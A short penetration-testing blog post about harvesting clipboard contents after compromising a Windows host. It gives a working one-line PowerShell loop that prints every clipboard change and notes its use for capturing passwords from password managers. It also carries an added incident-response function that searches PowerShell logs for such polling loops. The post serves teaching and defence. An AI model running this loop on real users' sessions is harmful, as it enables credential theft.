Quick article today about one of my favorite tools to use in a penetration test or red-team engagement after exploiting a Windows 10 system: Get-Clipboard.
Get-Clipboard retrieves the contents of the clipboard. It sounds pretty straightforward, but it can also be a big information disclosure threat. An attacker who gets access to the logged-in user's session can set up a loop to capture and display the clipboard contents every time it changes. Here is the 1-line PowerShell clipboard script I use:
$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } ; Sleep 1 }
Let's break down this 1-line script piece-by-piece:
- $x="";: Declare an empty variable $x; we'll use this to hold the contents of the clipboard
- while($true) {: Start a loop that continues until interrupted
- $y=get-clipboard -raw;: Get the contents of the clipboard, storing it in $y; the -Raw argument returns multiline clipboard contents as a single string instead of an array
- if ($x -ne $y) {: If the $y clipboard contents differ from what we saw in $x, then execute the following block of statements.
- Write-Host $y;: Write the new clipboard contents to the host (screen)
- $x=$y: Set $x to be equal to $y so we don't print the changed clipboard contents more than once
- } ;: End the earlier if block
- Sleep 1: Wait 1 second before checking the clipboard again
- }: End the earlier while($true) loop
Running this command on a Windows host will reveal anything copied into the clipboard, but it is particularly useful when the victim uses a password manager.
Password managers often make use of the clipboard to share password information between applications. Many password managers will clear a password from the clipboard after a few minutes to prevent it from being disclosed, but an active attacker can interrogate the clipboard for password information very quickly.
Here's an example of this script in use on a macOS system against the 1Password password manager.
Attacks against the clipboard aren't new, and they affect a lot of platforms. Where possible, avoid using the clipboard for sensitive data like passwords (use the password manager browser plugin where possible, for example). Otherwise, recognize the clipboard as a weak point in most operating systems, and conduct your incident response investigations accordingly.
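For the incident response side, here is an added example (not part of the original post) that hunts PowerShell script block logs for clipboard-polling loops like the one above. It assumes script block logging is enabled so that Event ID 4104 entries exist in the Microsoft-Windows-PowerShell/Operational log; the function name Find-ClipboardPolling and its parameters are my own.

```powershell
# Added example: hunt Event ID 4104 (script block logging) for loops that read the clipboard.
# Assumes script block logging is enabled on the host being examined.
function Find-ClipboardPolling {
    param(
        [int]$Hours = 24,                          # how far back to search
        [string]$ComputerName = $env:COMPUTERNAME  # local host by default
    )

    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object {
            # Flag script blocks that both read the clipboard (cmdlet or .NET Clipboard class)
            # and contain a loop construct, i.e. repeated polling rather than a one-off read.
            ($_.Message -match '(?i)get-clipboard|Clipboard\]::Get') -and
            ($_.Message -match '(?i)\bwhile\s*\(|\bfor\s*\(|\bforeach\b|\bdo\s*\{')
        } |
        ForEach-Object {
            # The 4104 message starts with "Creating Scriptblock text (N of M):" and the
            # script text follows on the next lines; keep the first line of the block as a preview.
            $lines = $_.Message -split "`r?`n"
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                UserSid     = $_.UserId
                Preview     = $lines[1]
            }
        }
}

# Usage: review the last three days of activity on the local host
Find-ClipboardPolling -Hours 72 | Format-Table -AutoSize
```

Hits still need a human look, since legitimate scripts occasionally read the clipboard inside a loop; the point is to surface candidates quickly during an investigation.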
-Joshua Wright
Joshua Wright is the author of SANS SEC504: Hacker Tools, Techniques, and Incident Handling, a faculty fellow for the SANS Institute, and a senior technical director at Counter Hack.